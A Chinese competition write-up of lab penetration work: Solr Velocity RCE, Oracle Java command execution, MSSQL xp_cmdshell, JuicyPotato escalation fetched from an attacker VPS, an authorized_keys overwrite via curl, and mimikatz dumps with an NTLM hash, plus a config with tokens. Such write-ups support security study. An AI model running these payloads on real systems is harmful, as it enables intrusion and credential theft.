# 组件向 core 注册使用的 token, 迁移请保持 BOOTSTRAP_TOKEN 与旧环境一致,
# 请勿使用特殊字符串
# (*) Warning: Keep this value secret.
# (*) 勿向任何人泄露 BOOTSTRAP_TOKEN
#
BOOTSTRAP_TOKEN=MjcxMzE5ZjYtZTE4YS0xMWVk
# 日志等级 INFO, WARN, ERROR
#
LOG_LEVEL=ERROR
# JumpServer 容器使用的网段, 请勿与现有的网络冲突, 根据实际情况自行修改
#
DOCKER_SUBNET=192.168.250.0/24
# ipv6 nat, 正常情况下无需开启
# 如果宿主不支持 ipv6 开启此选项将会导致无法获取真实的客户端 ip 地址
#
USE_IPV6=0
DOCKER_SUBNET_IPV6=fc00:1010:1111:200::/64
################################# MySQL 配置 ##################################
# 外置 MySQL 需要输入正确的 MySQL 信息, 内置 MySQL 系统会自动处理
#
DB_HOST=mysql
DB_PORT=3306
DB_USER=root
DB_PASSWORD=MjcxMzE5ZjYtZTE4YS0xMWVkLT
DB_NAME=jumpserver
################################# Redis 配置 ##################################
# 外置 Redis 需要请输入正确的 Redis 信息, 内置 Redis 系统会自动处理
#
REDIS_HOST=redis
REDIS_PORT=6379
REDIS_PASSWORD=MjcxMzE5ZjYtZTE4YS0xMWVkLT
################################## 访问配置 ###################################
# 对外提供服务端口, 如果与现有服务冲突请自行修改
# 如果不想对外提供访问可以使用 127.0.0.1:<port>, eg: 127.0.0.1:33060
#
HTTP_PORT=80
SSH_PORT=2222
MAGNUS_PORTS=30000-30100
################################# HTTPS 配置 #################################
# 参考 https://docs.jumpserver.org/zh/master/admin-guide/proxy/ 配置
#
# USE_LB=1
# HTTPS_PORT=443
# SERVER_NAME=your_domain_name
# SSL_CERTIFICATE=your_cert
# SSL_CERTIFICATE_KEY=your_cert_key
#
CLIENT_MAX_BODY_SIZE=4096m
################################## 组件配置 ###################################
# 组件注册使用, 默认情况下向 core 容器注册, 集群环境需要修改为集群 vip 地址
#
CORE_HOST=http://core:8080
# Task 配置, 是否启动 jms_celery 容器, 单节点必须开启
#
USE_TASK=1
# XPack 包, 企业版本自动开启, 开源版本设置无效
#
RDP_PORT=3389
# Core Session 定义,
# SESSION_COOKIE_AGE 表示闲置多少秒后 session 过期,
# SESSION_EXPIRE_AT_BROWSER_CLOSE=true 表示关闭浏览器即 session 过期
#
# SESSION_COOKIE_AGE=86400
SESSION_EXPIRE_AT_BROWSER_CLOSE=True
# Lion 开启字体平滑, 优化体验
#
JUMPSERVER_ENABLE_FONT_SMOOTHING=True
################################## 其他配置 ##################################
# 终端使用宿主 HOSTNAME 标识, 首次安装自动生成
#
SERVER_HOSTNAME=IDSS
# 当前运行的 JumpServer 版本号, 安装和升级完成后自动生成
#
CURRENT_VERSION=v2.27.0拿到
SECRET_KEY=MjcxMzE5ZjYtZTE4YS0xMWVkLTk5MDYtYWMxZjZiZGYyOTM0BOOTSTRAP_TOKEN=MjcxMzE5ZjYtZTE4YS0xMWVk
先利用 BOOTSTRAP_TOKEN 读取 assess_key 和 secret
然后借助 jumpserver 的 API 去执行命令 RCE
但是做到这里比赛结束了,寄!
(然后通宵打了两天,顶不住,随便整理了一下做出来的部分的 wp 直接交平台上就呼呼了,累累
(然而靶场就关了,后面也复现不起来了
后面的步骤应该还是参考 Zabbix与Jumpserver后渗透小记 这篇文章来
不过赛后和其他师傅聊了下,说再后面还有个 VMware ESXi,要用 log4j 打,但这玩意不是想象中的那么好日,摸了(
漏洞挖掘场景4 [2/3]
10.103.31.38:22 open
10.103.31.38:8983 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle:http://10.103.31.38:8983 code:302 len:0 title:None 跳转url: http://10.103.31.38:8983/solr/
[*] WebTitle:http://10.103.31.38:8983/solr/ code:200 len:14543 title:Solr Admin
[+] http://10.103.31.38:8983 poc-yaml-solr-cve-2019-0193
[+] http://10.103.31.38:8983 poc-yaml-solr-velocity-template-rce
flag1 192.168.33.39 apache_solr
https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template/tree/master
$ python apache_solr_exec.py 10.103.31.38 8983
OS Realese: Linux, OS Version: 3.10.0-1160.80.1.el7.x86_64
if remote exec failed, you should change your command with right os platform
Init node test1 Successfully, exec command=whoami
RCE Successfully @Apache Solr node test1
root
Init node test2 Successfully, exec command=whoami
RCE Successfully @Apache Solr node test2
root
Init node test3 Successfully, exec command=whoami
RCE Successfully @Apache Solr node test3
root
Init node test4 Successfully, exec command=whoami
RCE Successfully @Apache Solr node test4
root
Init node test5 Successfully, exec command=whoami
RCE Successfully @Apache Solr node test5
root
# ls -al /root
RCE Successfully @Apache Solr node test1
total 52
dr-xr-x---. 4 root root 216 May 20 23:25 .
dr-xr-xr-x. 17 root root 263 May 20 23:25 ..
-rw-------. 1 root root 6880 Nov 11 2022 anaconda-ks.cfg
-rw------- 1 root root 76 May 12 06:40 .bash_history
-rw-r--r--. 1 root root 18 Dec 29 2013 .bash_logout
-rw-r--r--. 1 root root 176 Dec 29 2013 .bash_profile
-rw-r--r--. 1 root root 176 Dec 29 2013 .bashrc
-rw-r--r--. 1 root root 100 Dec 29 2013 .cshrc
-rw-r--r-- 1 root root 38 May 20 23:25 flag
-rw-------. 1 root root 6587 Nov 11 2022 original-ks.cfg
drwxr-xr-x 9 root root 201 May 4 09:02 solr-7.7.2
drwx------. 2 root root 29 Apr 12 10:03 .ssh
-rw-r--r--. 1 root root 129 Dec 29 2013 .tcshrc
-rw------- 1 root root 4836 May 7 05:52 .viminfo
# cat /root/flag
flag{hPucBnCtxSl38JG4orYW2a5diqUpejH7}
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:6d:2a:35:d8 brd ff:ff:ff:ff:ff:ff
inet 10.103.32.51/16 brd 10.103.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::5054:6dff:fe2a:35d8/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:5d:70:af:3f brd ff:ff:ff:ff:ff:ff
inet 192.168.33.39/24 brd 192.168.33.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::5054:5dff:fe70:af3f/64 scope link
valid_lft forever preferred_lft forever
# ip r
default via 10.103.0.1 dev eth0
10.103.0.0/16 dev eth0 proto kernel scope link src 10.103.32.51
192.168.33.0/24 dev eth1 proto kernel scope link src 192.168.33.39python apache_solr_exec.py 10.103.32.51 8983 "curl vpsip:port/authorized_keys -o /root/.ssh/authorized_keys"直接加个 key 然后 ssh 上去
内网 192.168.33
扫内网
(icmp) Target 192.168.33.39 is alive
(icmp) Target 192.168.33.5 is alive
(icmp) Target 192.168.33.170 is alive
(icmp) Target 192.168.33.172 is alive
[*] Icmp alive hosts len is: 4
192.168.33.5:445 open
192.168.33.172:1521 open
192.168.33.172:445 open
192.168.33.170:445 open
192.168.33.5:139 open
192.168.33.172:139 open
192.168.33.170:139 open
192.168.33.5:135 open
192.168.33.172:135 open
192.168.33.170:135 open
192.168.33.39:22 open
192.168.33.5:88 open
192.168.33.39:8983 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]192.168.33.170
[->]DBserver
[->]192.168.33.170
[*] NetBios: 192.168.33.5 [+]DC FOUR\AD4
[*] NetBios: 192.168.33.170 FOUR\DBSERVER
[*] NetBios: 192.168.33.172 FOUR\SERVER
[*] NetInfo:
[*]192.168.33.172
[->]server
[->]192.168.33.172
[*] WebTitle: http://192.168.33.39:8983 code:302 len:0 title:None 跳转url: http://192.168.33.39:8983/solr/
[*] NetInfo:
[*]192.168.33.5
[->]AD4
[->]192.168.33.5
[*] WebTitle: http://192.168.33.39:8983/solr/ code:200 len:14543 title:Solr Admin
[+] http://192.168.33.39:8983 poc-yaml-solr-cve-2019-0193
[+] http://192.168.33.39:8983 poc-yaml-solr-velocity-template-rce
起个代理到内网
flag2 192.168.33.172 FOUR\SERVER Oracle db
history
sqlplus system/[email protected]:1521/orcl
192.168.33.172:1521
select * from v$version;
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
PL/SQL Release 11.2.0.1.0 - Production
CORE 11.2.0.1.0 Production
TNS for 64-bit Windows: Version 11.2.0.1.0 - Production
NLSRTL Version 11.2.0.1.0 - Production命令执行 DBMS_XMLQUERY
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD';
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/执行命令:
select LinxRUNCMD('whoami') from dual;发现不能有空格。。
https://github.com/jas502n/oracleShell
这工具感觉只支持 Linux 的命令执行,还得手动读文件。。
create or replace directory user_dir as 'C:\Users\Administrator\Desktop\';
grant read on directory user_dir to public;
grant write on directory user_dir to public;
select * from dba_directories;
declare
F1 utl_file.file_type;
V1 varchar2(32767);
begin
F1:=utl_file.fopen('USER_DIR','flag','r');
utl_file.get_line(F1,V1,50);
utl_file.fclose(F1);
dbms_output.put_line(V1);
end;
漏洞挖掘场景1 [0/2]
(icmp) Target 10.103.83.172 is alive
[*] Icmp alive hosts len is: 1
10.103.83.172:1433 open
10.103.83.172:445 open
10.103.83.172:139 open
[*] alive ports len is: 3
start vulscan
[+] mssql:10.103.83.172:1433:sa P@ssw0rd入口 192.168.33.175 MSSQL
MSSQL 弱口令,连上去
Microsoft SQL Server 2016 (SP1) (KB3182545) - 13.0.4001.0 (X64)
Oct 28 2016 18:17:30
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows Server 2016 Datacenter 6.3 <X64> (Build 14393: ) (Hypervisor)开始 xp_cmdshell 扩展功能
use master;
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
##1开启,0关闭,关闭时从xp_cmdshell ---> options依次关闭
use master;
exec master..xp_cmdshell "whoami";
nt service\mssqlserver
用户信息
----------------
用户名 SID
====================== ===============================================================
nt service\mssqlserver S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
组信息
-----------------
组名 类型 SID 属性
==================================== ====== ============ ==============================
Mandatory Label\High Mandatory Level 标签 S-1-16-12288
Everyone 已知组 S-1-1-0 必需的组, 启用于默认, 启用的组
BUILTIN\Performance Monitor Users 别名 S-1-5-32-558 必需的组, 启用于默认, 启用的组
BUILTIN\Users 别名 S-1-5-32-545 必需的组, 启用于默认, 启用的组
NT AUTHORITY\SERVICE 已知组 S-1-5-6 必需的组, 启用于默认, 启用的组
CONSOLE LOGON 已知组 S-1-2-1 必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users 已知组 S-1-5-11 必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization 已知组 S-1-5-15 必需的组, 启用于默认, 启用的组
LOCAL 已知组 S-1-2-0 必需的组, 启用于默认, 启用的组
NT SERVICE\ALL SERVICES 已知组 S-1-5-80-0 必需的组, 启用于默认, 启用的组
特权信息
----------------------
特权名 描述 状态
============================= ==================== ======
SeAssignPrimaryTokenPrivilege 替换一个进程级令牌 已禁用
SeIncreaseQuotaPrivilege 为进程调整内存配额 已禁用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeImpersonatePrivilege 身份验证后模拟客户端 已启用
SeCreateGlobalPrivilege 创建全局对象 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用
network
以太网适配器 以太网 2:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::1d49:a11d:9b36:4dcf%12
IPv4 地址 . . . . . . . . . . . . : 10.103.83.172
子网掩码 . . . . . . . . . . . . : 255.255.0.0
默认网关. . . . . . . . . . . . . : 10.103.0.1
以太网适配器 以太网 3:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::f590:57fd:c34:f5f4%2
IPv4 地址 . . . . . . . . . . . . : 192.168.33.175
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
活动连接
协议 本地地址 外部地址 状态 PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 716
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 2644
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 820
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 436
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 940
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1604
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 828
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 1476
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 572
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 564
TCP 10.103.83.172:139 0.0.0.0:0 LISTENING 4
TCP 10.103.83.172:1433 10.103.0.1:61428 ESTABLISHED 2644
TCP 10.103.83.172:1433 10.103.0.1:61439 ESTABLISHED 2644
TCP 10.103.83.172:1433 10.103.0.1:61440 ESTABLISHED 2644
TCP 10.103.83.172:1433 10.103.0.1:61442 ESTABLISHED 2644
TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 2644
TCP 192.168.33.175:139 0.0.0.0:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 716
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1433 [::]:0 LISTENING 2644
TCP [::]:3389 [::]:0 LISTENING 820
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 436
TCP [::]:49665 [::]:0 LISTENING 940
TCP [::]:49666 [::]:0 LISTENING 1604
TCP [::]:49667 [::]:0 LISTENING 828
TCP [::]:49668 [::]:0 LISTENING 1476
TCP [::]:49669 [::]:0 LISTENING 572
TCP [::]:49670 [::]:0 LISTENING 564
TCP [::1]:1434 [::]:0 LISTENING 2644
UDP 0.0.0.0:123 *:* 284
UDP 0.0.0.0:500 *:* 828
UDP 0.0.0.0:3389 *:* 820
UDP 0.0.0.0:4500 *:* 828
UDP 0.0.0.0:5050 *:* 284
UDP 0.0.0.0:5353 *:* 756
UDP 0.0.0.0:5355 *:* 756
UDP 10.103.83.172:137 *:* 4
UDP 10.103.83.172:138 *:* 4
UDP 192.168.33.175:137 *:* 4
UDP 192.168.33.175:138 *:* 4
UDP [::]:123 *:* 284
UDP [::]:500 *:* 828
UDP [::]:3389 *:* 820
UDP [::]:4500 *:* 828
UDP [::]:5353 *:* 756
UDP [::]:5355 *:* 756
tasklist
映像名称 PID 会话名 会话# 内存使用
========================= ======== ================ =========== ============
System Idle Process 0 0 4 K
System 4 0 128 K
smss.exe 268 0 1,128 K
csrss.exe 364 0 3,924 K
wininit.exe 436 0 4,932 K
csrss.exe 444 1 3,588 K
winlogon.exe 496 1 12,696 K
services.exe 564 0 6,928 K
lsass.exe 572 0 14,736 K
svchost.exe 656 0 13,380 K
svchost.exe 716 0 8,048 K
svchost.exe 820 0 13,440 K
svchost.exe 828 0 44,628 K
dwm.exe 880 1 29,648 K
svchost.exe 908 0 17,252 K
svchost.exe 940 0 14,380 K
svchost.exe 284 0 16,096 K
svchost.exe 756 0 19,720 K
svchost.exe 784 0 6,988 K
svchost.exe 560 0 15,700 K
svchost.exe 1476 0 6,676 K
spoolsv.exe 1604 0 15,148 K
svchost.exe 1688 0 18,100 K
svchost.exe 1748 0 8,100 K
dllhost.exe 1788 0 7,524 K
qemu-ga.exe 1800 0 8,456 K
MsMpEng.exe 1836 0 74,928 K
sqlwriter.exe 1860 0 7,504 K
dllhost.exe 1424 0 12,448 K
msdtc.exe 2252 0 9,468 K
sqlceip.exe 2636 0 55,028 K
sqlservr.exe 2644 0 262,412 K
LogonUI.exe 1996 1 41,476 K
MpCmdRun.exe 2904 0 7,860 K
cmd.exe 3804 0 2,784 K
conhost.exe 1624 0 9,580 K
tasklist.exe 2764 0 7,780 K
WmiPrvSE.exe 3872 0 8,492 K有 Windows defender
JuicePotato 提权
exec master..xp_cmdshell 'powershell -Command "Invoke-WebRequest http://vpsip:12345/JuicyPotato.exe -OutFile C:\Users\Public\2.exe"';
rce 的命令放下面了,就是将命令写进 1.bat 文件,然后启动该 bat
(对应的 3.exe 来自 https://www.cnblogs.com/J0o1ey/p/15714555.html )
use master;
-- exec master..xp_cmdshell 'powershell -Command "Invoke-WebRequest http://VPSIP:PORT/1.ps1 -OutFile C:\Users\Public\1.ps1"';
-- exec master..xp_cmdshell 'powershell -Command "powershell -ep bypass C:\Users\Public\1.ps1"';
-- exec master..xp_cmdshell 'C:\Users\public\2.exe -t * -p c:\windows\system32\cmd.exe -l 9003 -c {0134A8B2-3407-4B45-AD25-E9F7C92A80BC}"';
exec master..xp_cmdshell 'echo dir > C:\Users\Public\1.bat'
exec master..xp_cmdshell 'type C:\Users\Public\1.bat'
exec master..xp_cmdshell 'C:\Users\public\3.exe -p "C:\Users\Public\1.bat" -c {0134A8B2-3407-4B45-AD25-E9F7C92A80BC}';修改密码之后登录进去找 flag,发现找不到
rdp 连上去
内网
start infoscan
(icmp) Target 192.168.33.175 is alive
(icmp) Target 192.168.33.174 is alive
[*] Icmp alive hosts len is: 2
192.168.33.175:135 open
192.168.33.174:445 open
192.168.33.175:1433 open
192.168.33.175:445 open
192.168.33.174:139 open
192.168.33.174:135 open
192.168.33.175:139 open
[*] alive ports len is: 7
start vulscan
[*] NetInfo:
[*]192.168.33.174
[->]PC01
[->]10.177.166.21
[->]192.168.33.174
[*] NetBios: 192.168.33.174 CTF1\PC01
[+] mssql:192.168.33.175:1433:sa P@ssw0rd
>arp -a
接口: 192.168.33.175 --- 0x2
Internet 地址 物理地址 类型
192.168.33.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
255.255.255.255 ff-ff-ff-ff-ff-ff 静态
接口: 10.103.83.172 --- 0xc
Internet 地址 物理地址 类型
10.103.0.1 f8-bc-12-31-8a-5d 动态
10.103.3.127 52-54-48-6c-b2-d1 动态
10.103.6.19 52-54-5f-0e-53-f2 动态
10.103.8.47 52-54-35-43-f6-86 动态
10.103.13.192 52-54-53-48-e6-d3 动态
10.103.35.44 52-54-55-0d-75-79 动态
10.103.37.229 52-54-65-54-a4-d5 动态
10.103.41.38 52-54-3c-12-1c-8e 动态
10.103.46.254 52-54-61-57-be-c9 动态
10.103.64.229 52-54-52-52-9b-72 动态
10.103.75.171 52-54-48-36-8b-6c 动态
10.103.80.18 52-54-4c-34-ae-fd 动态
10.103.86.229 52-54-0c-79-0e-cf 动态
10.103.91.186 52-54-73-61-37-db 动态
10.103.108.161 52-54-4e-35-3b-99 动态
10.103.128.128 52-54-39-60-bf-35 动态
10.103.129.15 52-54-47-27-0b-37 动态
10.103.141.136 52-54-65-4e-51-10 动态
10.103.144.229 52-54-15-4c-14-82 动态
10.103.151.28 52-54-6a-40-99-88 动态
10.103.159.87 52-54-61-3c-37-c3 动态
10.103.169.105 52-54-70-41-c6-a5 动态
10.103.177.11 52-54-45-14-b5-d9 动态
10.103.186.157 52-54-3f-5a-0d-80 动态
10.103.205.174 52-54-35-1f-8d-73 动态
10.103.206.84 52-54-6c-34-d5-98 动态
10.103.209.123 52-54-59-67-4d-4b 动态
10.103.215.14 52-54-4f-6c-aa-ba 动态
10.103.216.75 52-54-28-26-b5-b1 动态
10.103.224.15 52-54-36-60-d7-36 动态
10.103.234.138 52-54-22-6c-0d-9e 动态
10.103.234.181 52-54-01-70-01-02 动态
10.103.238.167 52-54-1c-2e-da-6f 动态
10.103.241.244 52-54-0d-6f-34-f2 动态
10.103.255.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
255.255.255.255 ff-ff-ff-ff-ff-ff 静态192.168.33.175/24 is Valid CIDR
IPCound: 256
Scan Start: 2023-05-22 03:21:34
SMB: 192.168.33.175 WIN-FGHCOKNHM7P (Win2016-Datacenter-14393 10.0.14393 Win 10, 1607) Domain:WIN-FGHCOKNHM7P Dns:WIN-FGHCOKNHM7P SMBSigning:False
SMB: 192.168.33.174 PC01 (Win 10, 2004 10.0.19041) Domain:CTF1 Dns:ctf1.idss SMBSigning:False
NBT: 192.168.33.174 PC01 52-54-6B-4D-3E-31 CTF1
WMI: 192.168.33.174 PC01 (Win 10, 2004 X64 10.0.19041) Domain:CTF1 Dns:ctf1.idss
Winrm 192.168.33.175 WIN-FGHCOKNHM7P (Win 2016 10.0.14393) Domain:WIN-FGHCOKNHM7P Dns:WIN-FGHCOKNHM7P
WMI: 192.168.33.175 WIN-FGHCOKNHM7P (Win 2016 X64 10.0.14393) Domain:WIN-FGHCOKNHM7P Dns:WIN-FGHCOKNHM7P
DNS: 192.168.33.175 WIN-FGHCOKNHM7P
DNS: 192.168.33.174 PC01
RDP: 192.168.33.175 Win10/Win2016
MSSQL 192.168.33.175 WIN-FGHCOKNHM7P (Win 2016 10.0.14393) Domain:WIN-FGHCOKNHM7P Dns:WIN-FGHCOKNHM7P
RDP: 192.168.33.174 Win10/Win2016
HTTPS 192.168.33.175 WIN-FGHCOKNHM7P [] []
HTTPS 192.168.33.174 PC01 [] []
SMB: 192.168.33.175 WIN-FGHCOKNHM7P (Win2016-Datacenter-14393 10.0.14393 Win 10, 1607) Domain:WIN-FGHCOKNHM7P Signing:False
Error: http://192.168.33.175 无法连接到远程服务器
Error: http://192.168.33.175 无法连接到远程服务器
Error: http://192.168.33.175 无法连接到远程服务器
Struts2Check [S2-016] http://192.168.33.175
Error: http://192.168.33.175 未将对象引用设置到对象的实例。
Error: http://192.168.33.175 无法连接到远程服务器
Error: http://192.168.33.174 无法连接到远程服务器
Error: http://192.168.33.175 无法连接到远程服务器
Struts2Check [S2-DevMode] http://192.168.33.175
Error: http://192.168.33.174 无法连接到远程服务器
Error: http://192.168.33.175 未将对象引用设置到对象的实例。
Error: http://192.168.33.174 无法连接到远程服务器
Struts2Check [S2-016] http://192.168.33.174
Error: http://192.168.33.174 未将对象引用设置到对象的实例。
Error: http://192.168.33.174 无法连接到远程服务器
Error: http://192.168.33.174 无法连接到远程服务器
Struts2Check [S2-DevMode] http://192.168.33.174
Error: http://192.168.33.174 未将对象引用设置到对象的实例。
=============================================
OnlinePC:2
Cidr Scan Finished!mimikatz
mimikatz(commandline) # sekurlsa::logonpasswords full
...
Authentication Id : 0 ; 85624 (00000000:00014e78)
Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2023/5/22 3:47:09
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
msv :
tspkg :
wdigest :
* Username : WIN-FGHCOKNHM7P$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : SQLTELEMETRY
* Domain : NT Service
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 55853 (00000000:0000da2d)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/5/22 3:47:07
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : WIN-FGHCOKNHM7P$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 55817 (00000000:0000da09)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/5/22 3:47:07
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : WIN-FGHCOKNHM7P$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-FGHCOKNHM7P$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/5/22 3:47:06
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : WIN-FGHCOKNHM7P$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : win-fghcoknhm7p$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 26460 (00000000:0000675c)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/5/22 3:47:06
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 1955463 (00000000:001dd687)
Session : RemoteInteractive from 3
User Name : root
Domain : WIN-FGHCOKNHM7P
Logon Server : WIN-FGHCOKNHM7P
Logon Time : 2023/5/22 3:52:56
SID : S-1-5-21-1647943479-1973672040-3450735074-1003
msv :
[00000003] Primary
* Username : root
* Domain : WIN-FGHCOKNHM7P
* NTLM : 4ffda97268f45d1e96a3e5a05ba038b8
* SHA1 : 4694ea6285062a9c5ce6ecf58fbb779a0e508492
tspkg :
wdigest :
* Username : root
* Domain : WIN-FGHCOKNHM7P
* Password : (null)
kerberos :
* Username : root
* Domain : WIN-FGHCOKNHM7P
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 355158 (00000000:00056b56)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/5/22 3:50:53
SID : S-1-5-90-0-2
msv :
tspkg :
wdigest :
* Username : WIN-FGHCOKNHM7P$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 84721 (00000000:00014af1)
Session : Service from 0
User Name : MSSQLSERVER
Domain : NT Service
Logon Server : (null)
Logon Time : 2023/5/22 3:47:09
SID : S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
msv :
tspkg :
wdigest :
* Username : WIN-FGHCOKNHM7P$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : MSSQLSERVER
* Domain : NT Service
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/5/22 3:47:07
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-FGHCOKNHM7P$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/5/22 3:47:06
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-FGHCOKNHM7P$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : win-fghcoknhm7p$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :root 是我们加进去的,抓不到 Administrator 的?
重新开了台试试
use master;
exec master..xp_cmdshell 'echo C:\Users\MSSQLSERVER\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit > C:\Users\Public\1.bat'
exec master..xp_cmdshell 'C:\Users\public\3.exe -p "C:\Users\Public\1.bat" -c {0134A8B2-3407-4B45-AD25-E9F7C92A80BC}';
啥也没有啊,摸了(
感觉内网这台 Win10 192.168.33.174 PC01 应该是借助 175 这台入口机器的密码或者哈希横向过去,用 PsExec 之类的工具吧。
但是不懂为啥没抓到 hash,麻了(
